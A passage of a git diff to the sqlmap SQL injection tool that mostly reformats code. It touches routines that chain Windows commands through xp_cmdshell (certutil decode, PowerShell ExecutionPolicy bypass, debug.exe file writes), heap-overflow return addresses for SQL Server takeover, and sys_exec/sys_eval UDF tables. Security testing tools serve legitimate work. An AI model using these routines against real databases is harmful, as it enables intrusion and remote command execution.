kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: + if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]: infoMsg = "fetched tables' columns on " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index c0eec311b2e..7b89d60b4c1 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -368,16 +368,16 @@ def searchColumn(self): if foundTbl not in dbs[db]: dbs[db][foundTbl] = {} - if colConsider == "1": + if colConsider == '1': conf.db = db conf.tbl = foundTbl conf.col = column self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\ - and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): + if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) + kb.data.cachedColumns = {} else: dbs[db][foundTbl][column] = None diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index b8aeaaee071..c94f70f4fd1 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -73,10 +73,13 @@ def _updateDestChunk(self, fileContent, tmpPath): logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) - commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "debug < %s" % randScr, + "del /F /Q %s" % randScr + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) return chunkName @@ -195,12 +198,13 @@ def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) - commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, - "del /F /Q \"%s\"" % encodedBase64FilePath, - "del /F /Q \"%s\"" % randPSScriptPath) - complComm = " & ".join(command for command in commands) + commands = ( + "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, + "del /F /Q \"%s\"" % encodedBase64FilePath, + "del /F /Q \"%s\"" % randPSScriptPath + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): infoMsg = "using debug.exe to write the %s " % fileType @@ -219,10 +223,13 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) logger.debug(debugMsg) - commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "ren %s %s" % (chunkName, dFileName), + "move /Y %s %s" % (dFileName, dFile) + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) else: debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg += "sqlmap will split it into chunks locally, upload " @@ -244,17 +251,22 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) logger.debug(debugMsg) - commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + copyCmd, + "del /F /Q %s" % chunkName + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) - commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "move /Y %s %s" % (dFileName, dFile) + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using a custom visual basic script to write the " @@ -330,12 +342,14 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) - commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, - "del /F /Q %s" % randVbs, - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "cscript //nologo %s" % randVbs, + "del /F /Q %s" % randVbs, + "del /F /Q %s" % randFile + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): infoMsg = "using certutil.exe to write the %s " % fileType @@ -349,7 +363,7 @@ def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, file encodedFileContent = base64encode(wFileContent) - splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) + splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) @@ -357,11 +371,13 @@ def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, file logger.debug("decoding the file to %s.." % dFile) - commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) + commands = ( + "cd \"%s\"" % tmpPath, + "certutil -f -decode %s %s" % (randFile, dFile), + "del /F /Q %s" % randFile + ) - self.execCmd(complComm) + self.execCmd(" & ".join(command for command in commands)) def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): # NOTE: this is needed here because we use xp_cmdshell extended diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 67992416c6b..354b05b4807 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -88,12 +88,14 @@ def checkDbms(self): infoMsg = "confirming %s" % DBMS.MSSQL logger.info(infoMsg) - for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ - ("2005", "XACT_STATE()=XACT_STATE()"), \ - ("2008", "SYSDATETIME()=SYSDATETIME()"), \ - ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \ - ("2014", "CHARINDEX('12.0.2000',@@version)>0"), \ - ("2016", "ISJSON(NULL) IS NULL")): + for version, check in ( + ("2000", "HOST_NAME()=HOST_NAME()"), + ("2005", "XACT_STATE()=XACT_STATE()"), + ("2008", "SYSDATETIME()=SYSDATETIME()"), + ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), + ("2014", "CHARINDEX('12.0.2000',@@version)>0"), + ("2016", "ISJSON(NULL) IS NULL") + ): result = inject.checkBooleanExpression(check) if result: @@ -136,14 +138,16 @@ def checkDbmsOs(self, detailed=False): # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions # http://en.wikipedia.org/wiki/Windows_NT#Releases - versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)), - "2000": ("5.0", (4, 3, 2, 1)), - "XP": ("5.1", (3, 2, 1)), - "2003": ("5.2", (2, 1)), - "Vista or 2008": ("6.0", (2, 1)), - "7 or 2008 R2": ("6.1", (1, 0)), - "8 or 2012": ("6.2", (0,)), - "8.1 or 2012 R2": ("6.3", (0,)) } + versions = { + "NT": ("4.0", (6, 5, 4, 3, 2, 1)), + "2000": ("5.0", (4, 3, 2, 1)), + "XP": ("5.1", (3, 2, 1)), + "2003": ("5.2", (2, 1)), + "Vista or 2008": ("6.0", (2, 1)), + "7 or 2008 R2": ("6.1", (1, 0)), + "8 or 2012": ("6.2", (0,)), + "8.1 or 2012 R2": ("6.3", (0,)) + } # Get back-end DBMS underlying operating system version for version, data in versions.items(): diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index c3a3381e2e5..a728a74da9b 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -20,7 +20,7 @@ def __init__(self): GenericTakeover.__init__(self) def uncPathRequest(self): - #inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) + # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) def spHeapOverflow(self): @@ -31,21 +31,22 @@ def spHeapOverflow(self): """ returns = { - # 2003 Service Pack 0 - "2003-0": (""), + # 2003 Service Pack 0 + "2003-0": (""), - # 2003 Service Pack 1 - "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), + # 2003 Service Pack 1 + "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 12/2008 - #"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), + # 2003 Service Pack 2 updated at 12/2008 + # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 05/2009 - "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + # 2003 Service Pack 2 updated at 05/2009 + "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + + # 2003 Service Pack 2 updated at 09/2009 + # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), + } - # 2003 Service Pack 2 updated at 09/2009 - #"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), - } addrs = None for versionSp, data in returns.items(): diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index 276c67663a6..b91bbefca74 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py @@ -23,11 +23,11 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take def __init__(self): self.excludeDbsList = MYSQL_SYSTEM_DBS self.sysUdfs = { - # UDF name: UDF return data-type - "sys_exec": { "return": "int" }, - "sys_eval": { "return": "string" }, - "sys_bineval": { "return": "int" } - } + # UDF name: UDF return data-type + "sys_exec": {"return": "int"}, + "sys_eval": {"return": "string"}, + "sys_bineval": {"return": "int"} + } Syntax.__init__(self) Fingerprint.__init__(self) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 9a0ec75e67f..2e039532e27 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -41,18 +41,19 @@ def _commentCheck(self): # Reference: https://downloads.mysql.com/archives/community/ versions = ( - (32200, 32235), # MySQL 3.22 - (32300, 32359), # MySQL 3.23 - (40000, 40032), # MySQL 4.0 - (40100, 40131), # MySQL 4.1 - (50000, 50096), # MySQL 5.0 - (50100, 50172), # MySQL 5.1 - (50400, 50404), # MySQL 5.4 - (50500, 50554), # MySQL 5.5 - (50600, 50635), # MySQL 5.6 - (50700, 50717), # MySQL 5.7 - (60000, 60014), # MySQL 6.0 - ) + (32200, 32235), # MySQL 3.22 + (32300, 32359), # MySQL 3.23 + (40000, 40032), # MySQL 4.0 + (40100, 40131), # MySQL 4.1 + (50000, 50096), # MySQL 5.0 + (50100, 50172), # MySQL 5.1 + (50400, 50404), # MySQL 5.4 + (50500, 50558), # MySQL 5.5 + (50600, 50638), # MySQL 5.6 + (50700, 50720), # MySQL 5.7 + (60000, 60014), # MySQL 6.0 + (80000, 80003), # MySQL 8.0 + ) index = -1 for i in xrange(len(versions)): diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 4a5173b5241..19207ba3e7c 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -67,10 +67,10 @@ def udfSetRemotePath(self): # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file else: - #logger.debug("retrieving MySQL data directory absolute path") + # logger.debug("retrieving MySQL data directory absolute path") # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir - #self.__datadir = inject.getValue("SELECT @@datadir") + # self.__datadir = inject.getValue("SELECT @@datadir") # NOTE: specifying the relative path as './udf.dll' # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index bc24a57c2f8..41683881fda 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -23,12 +23,12 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, def __init__(self): self.excludeDbsList = PGSQL_SYSTEM_DBS self.sysUdfs = { - # UDF name: UDF parameters' input data-type and return data-type - "sys_exec": { "input": ["text"], "return": "int4" }, - "sys_eval": { "input": ["text"], "return": "text" }, - "sys_bineval": { "input": ["text"], "return": "int4" }, - "sys_fileread": { "input": ["text"], "return": "text" } - } + # UDF name: UDF parameters' input data-type and return data-type + "sys_exec": {"input": ["text"], "return": "int4"}, + "sys_eval": {"input": ["text"], "return": "text"}, + "sys_bineval": {"input": ["text"], "return": "int4"}, + "sys_fileread": {"input": ["text"], "return": "text"} + } Syntax.__init__(self) Fingerprint.__init__(self) diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py index 13129c9e2d7..3ba144511f5 100644 --- a/plugins/dbms/postgresql/syntax.py +++ b/plugins/dbms/postgresql/syntax.py @@ -22,6 +22,6 @@ def escape(expression, quote=True): """ def escaper(value): - return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) + return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 2b5f2d6f3a7..2432598b75c 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -176,7 +176,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod conf.db = self.getCurrentDb() elif conf.db is not None: - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 02fce6b7af5..75a9c704c58 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -400,7 +400,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -663,8 +663,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod query += condQuery elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.count % (conf.db, conf.db, \ - unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): @@ -763,8 +762,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, - conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column) elif Backend.isDbms(DBMS.INFORMIX): @@ -823,10 +821,7 @@ def getSchema(self): self.getTables() infoMsg = "fetched tables: " - infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \ - Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \ - else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \ - kb.data.cachedTables.items()]) + infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()]) logger.info(infoMsg) for db, tables in kb.data.cachedTables.items(): diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 0fab15af1ec..c0a94627471 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -470,7 +470,7 @@ def dumpAll(self): if kb.data.cachedTables: if isinstance(kb.data.cachedTables, list): - kb.data.cachedTables = { None: kb.data.cachedTables } + kb.data.cachedTables = {None: kb.data.cachedTables} for db, tables in kb.data.cachedTables.items(): conf.db = db diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index a57548c79cd..59ca3284ef3 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -49,7 +49,7 @@ def _checkFileLength(self, localFile, remoteFile, fileRead=False): elif Backend.isDbms(DBMS.MSSQL): self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") - inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); + inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) diff --git a/tamper/between.py b/tamper/between.py index 57edd5151de..e64628f127f 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -55,5 +55,4 @@ def tamper(payload, **kwargs): _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) retVal = retVal.replace(match.group(0), _) - return retVal diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py index 5ac14a559a0..b049d858271 100644 --- a/tamper/ifnull2casewhenisnull.py +++ b/tamper/ifnull2casewhenisnull.py @@ -61,5 +61,3 @@ def tamper(payload, **kwargs): break return payload - - diff --git a/txt/checksum.md5 b/txt/checksum.md5 index dcb2f4f475c..e2a2c59e146 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,35 +21,35 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py -9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py -a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py +62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py +a66044daa98684fde830324c54da98ee lib/controller/controller.py +c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -052c368ae6ca09362a19376c8483fa85 lib/core/agent.py -591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py +b1990c7805943f0c973a853bba981d96 lib/core/agent.py +fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py -2910524e4478be6b5893fb9d851a62ec lib/core/convert.py +1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py -9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py -a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py +fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py +da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py -c8551f7696a76450e6d139409e4f06cd lib/core/enums.py +bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py -8a9346b975931d8d995354692ab68f82 lib/core/option.py -7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py +c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py +911ec851f2cad046036ddaf776c8559f lib/core/option.py +7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -053e81e44a3df054a3ffd39d58de7079 lib/core/settings.py -d0adc28a38e43a787df4471f7f027413 lib/core/shell.py -63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py -3cc852f927833895361973fbcfd156d2 lib/core/target.py +36989c9805e448024fc49aabde49a69e lib/core/settings.py +0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py +a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py +12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -57,122 +57,122 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -d505c725f5d6887ec80b5b94ca1dc9f5 lib/parse/cmdline.py +f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py +8d7321a1bc1a26ac55b2398bf445d78f lib/parse/headers.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py +53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -94c0ce8d2a2d9001a416420f61b67ee7 lib/request/connect.py +b91eaa32c602182c4f6e2f7d6de61267 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 